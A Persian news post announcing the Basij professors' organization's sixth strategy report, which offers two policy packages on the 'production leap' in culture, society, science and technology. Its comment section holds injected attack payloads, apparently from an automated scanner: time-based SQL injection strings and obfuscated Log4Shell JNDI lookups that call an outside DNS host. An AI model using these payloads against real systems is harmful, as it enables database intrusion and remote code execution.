ششمین گزارش راهبرد سازمان بسیج اساتید منتشر شد

سه‌شنبه 2021/04/06 - 12:19 asatid
به همت دبیرخانه شورای راهبردی سازمان بسیج اساتید کشور:

ششمین گزارش راهبرد سازمان بسیج اساتید منتشر شد

دبیرخانه شورای راهبردی سازمان بسیج اساتید کشور ششمین گزارش راهبرد این سازمان را با ارائه دو بسته سیاستی "بسته سیاستی ابعاد و الزامات فرهنگی اجتماعی جهش تولید" و " بسته سیاستی جهش تولید در حوزه علم و فناوری" منتشر کرد.

به گزارش مرکز رسانه و ارتباطات نهضت استادی بسیج(ناب)، گزارش راهبرد شماره 6 سازمان بسیج اساتید با دو بسته سیاستی "بسته سیاستی ابعاد و الزامات فرهنگی اجتماعی جهش تولید" و " بسته سیاستی جهش تولید در حوزه علم و فناوری" منتشر شد.

بسته سیاستی ابعاد و الزامات فرهنگی اجتماعی جهش تولید

فرهنگ یکی از مقوله‌های مهم ارزشی کشورها به‌حساب می‌آید که مبتنی بر آموزش، دانش و عادات می‌باشد. امروزه نقش فرهنگ در اقتصاد از محورهای مورد توجه اقتصاددانان است و بر این اساس معتقدند که فرهنگ بر توسعه اقتصادی کشورها مؤثر می‌باشد. درواقع فرهنگ دارایی‌های زیادی از قبیل‌ مهارت‌ها و محصولات بهوجود می‌آورد که در ارتقاء رفاه جامعه اثر دارد. جهت فهمیدن اثر فرهنگ‌ بر اقتصاد بایستی توجه داشته باشیم که فرهنگ درواقع ارزش‌ها و هنجارهای سیستمی است که در بین افراد جامعه وجود دارد و در فعالیت‌های اقتصادی خود را نشان می‌دهد. دراین راستابایستی‌ ازیک‌طرف تلاش خود را در جهت‌ فرهنگ‌سازی و پایه‌ریزی فرهنگ مصرف‌ کم و صرفه‌جویی به کار بریم و از طرف‌ دیگر توضیح دقیق اقتصادی در مورد رفتارهای اقتصادی بایستی مطرح شود و با تغییر شرایط، رفتار افراد را تحت تأثیر قرار داد، یعنی‌ برای عملیاتی شدن برنامه‌ها بایستی ازیک‌طرف مهندسی فرهنگی صورت گیرد و درعین‌حال از اصول اقتصادی نیز کمک گرفته شود.

اکنون پس از گذشت بیش از چهل‌ودو سال از جهش سیاسی ملت و کشور ما در سال ۵۷، سال ۹۹ به‌عنوان سال جهش تولید نام‌گذاری شد، جهشی سیاسی، فرهنگی و اجتماعی؛ نیاز مبرم به جهش تولید در عرصه اقتصاد، به‌عنوان لازمه‌های یک جامعه پویا، سرزنده و بالنده به‌شدت احساس می‌شود. بی‌تردید آنچه دغدغه مقام معظم رهبری در سال‌های گذشته در مورد اقتصاد و در مسئله تولید است و دائماً توسط معظم له تکرار می‌شود، یک نیاز حیاتی برای جامعه ما است که باید قبل از هر چیزی برای محقق نمودن این نقشه و راه نجات جامعه در حوزه اقتصادیکه کمتر به آن توجه شده است و از آن می‌توان به پایه و اساس تحقق مسئله تولید، اقتصاد و جهش تولید در کشور نام برد، موضوع بسیار مهم «فرهنگ جهش تولید» است. لذا برای موفقیت در حوزه اقتصاد و تحقق فرمایشات مقام معظم رهبری در امر اقتصاد و خصوصاً جهش تولید، باید هرچه بیشتر به مقوله فرهنگ‌سازی و گفتمان سازي جهش تولیداهتمام ورزیم.

در این راستا كميته فرهنگي و اجتماعي قرارگاه جهش تولید سازمان بسیج اساتید کشور به ریاست رشيد جعفر پور و با حضور اعضای این کمیته؛ محمدرضا اخضريان كاشاني، نوري، اميرسعيد كرمي، علی اصغر طيبي رهني، مهدي نادري و با نظارت علمی علی مرادزاده  بسته سیاستی "ابعاد و الزامات فرهنگی اجتماعی جهش تولید" را تهیه و تدوین نموده است که توسط دبیرخانه شورای راهبردی سازمان بسیج اساتید منتشر شده است.

تبیین وضع موجود از طریق تجزیه وتحلیل آماری؛ عوامل و الزامات مؤثر در ایجاد جهش تولید؛ تبیین صحیح «فرهنگ کار » اولویت اول «جهش تولید»؛ سیاست‌های فرهنگي در حوزه جهش توليد؛ وضعیت شناسی محیطی روندها و فرآیندهای معطوف به جهش تولید ( نقاط قوت و ظرفیت‌ها- فرصت‌ها- ضعف‌ها، موانع و چالش‌های پیشروی گفتمان‌سازی، جهش‌توليد- تهدیدها)؛ گفتمان سازی ابر راهبرد جهش تولید؛ اصول گفتمان سازی جهش توليد و راه حل‌ها و راهکارهای جهش توليد و مطالبه گری آن از جمله فصول اصلی این سند گزارش شده است.

بسته سیاستی جهش تولید در حوزه علم و فناوری

پیرو نام‌گذاری سال 1399 از سوي مقام معظم رهبري با عنوان جهش تولید و تأکید ایشان بر ایجاد تغییر محسوس در زندگی آحاد مردم و همچنین مصوبات قرارگاه جنبش استادی سازمان بسیج اساتید مبنی بر تهیه بسته سیاستی تحقق شعار سال، کمیته علم و فناوری قرارگاه جهش تولید سازمان بسیج اساتید کشور به ریاست ساسان شاه ویسی، مبادرت به تهیه بسته پیشنهادی سیاستی جهش تولید  نموده است. گزارش‌های موجود در مرکز پژوهش‌های مجلس، کمیسیون ویژه جهش تولید، موسسه مطالعات بازرگانی، اتاق بازرگانی ایران و اتاق استان‌ها و دیدگاه اساتید همراه در این کمیته  دست‌مایه تهیه و تدوین این بسته سیاستی شده است.

وضعيت نامطلوب نظام توليد و محيط نامساعد کسب‌وکار، موجب شده است انگيزه كافي براي ورود به بخش توليد در كشور (اعم از صنعت، معدن و كشاورزي)وجود نداشته باشد، در اين شرايط است كه بازارهاي مربوط به سوداگري، واسطه‌گری و سرمایه‌گذاری در طلا و ارز با هجوم مواجه می‌شوند و نقدينگي به سمت اين بازارها سوق پيدا می‌کند. سرمایه‌گذاری نامطلوب در بخش توليد( صنعتي و كشاورزي ) در کشور، كه از یک‌سو برآمده از سیاست‌های نادرست در سطح اقتصاد كلان) نرخ ارز، نرخ سود، كنترل تورم، كسري بودجه و... و از سوي ديگر برآمده از نبود الگو و سياست درست صنعتي و توليدي است، موجب شده است فضايي به وجود بيايد كه سرمایه‌گذاران انگيزه كافي را براي ورود به اين حوزه نداشته باشند.

بر این اساس، این بسته به بیان مبانی نظري و مفهوم جهش تولید و مختصات اقتصادي ایران و (جهان) در شروع سال جهش تولید و آسیب‌شناسی برنامه‌های رونق تولید و فرصت جهت دستیابی به جهش اقتصادي و تولیدي و در انتها به محرک‌ها، پیشران‌ها و رئوس برنامه جهش تولید می‌پردازد و البته به جهت تسریع در تدوین بسته، ورود به چرخه‌های معیوب ساختاری و سنواتی را صرفاً در اسناد پشتیبان رصد و پایش می‌نماید.

همچنین بر ارائه راهكارها و پيشنهادهاي سياستي، کوتاه‌مدت كه قابليت اجرايي و عملياتي شدن آن در سال جاري وجود داشته باشد، متمركز می‌گردد. راهكارها و اقدامات راهبردي و عملياتي در اين گزارش در محورهاي حوزه محيط کسب‌وکار، حوزه پولي، بانكي و ارزي، حوزه بازرگاني و حوزه اقتصاد كلان و برنامه‌ریزی دسته‌بندی شده است و در انتهاي گزارش نيز سرفصل راهكارها به همراه مباني قانوني و دستگاه متولي جهت پيگيري و اجرا مشخص شده است.

انتهای پیام/

 

نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:10
-1' OR 2+370-370-1=0+0+0+1 or 'tOZHxVuf'='
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:10
${j${::-n}di:dns${::-:}//hithkbbrlqssk0a1db${::-.}bxss.me}zzzz
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:10
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:10
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j.074625.8-294428.8.457cd${::-.}1${::-.}bxss.me}}
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:10
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:10
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
hLxl7A5j'; waitfor delay '0:0:15' --
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
-5 OR 34=(SELECT 34 FROM PG_SLEEP(15))--
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
-5) OR 129=(SELECT 129 FROM PG_SLEEP(15))--
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
-1)) OR 86=(SELECT 86 FROM PG_SLEEP(15))--
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
gNdVuYyJ' OR 893=(SELECT 893 FROM PG_SLEEP(15))--
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
ALUVPMEL') OR 42=(SELECT 42 FROM PG_SLEEP(15))--
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
'+response.write(9024075*9826420)+'
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
jhCp32Nq')) OR 676=(SELECT 676 FROM PG_SLEEP(15))--
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
"+response.write(9024075*9826420)+"
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
نام کاربر مدیر فنی
یک‌شنبه 2023/01/15 - 08:11
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

افزودن دیدگاه جدید

About text formats

Restricted HTML

  • تگ‌های HTML مجاز: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol start type> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id>
  • خطوط و پاراگراف‌ها بطور خودکار اعمال می‌شوند.
  • Web page addresses and email addresses turn into links automatically.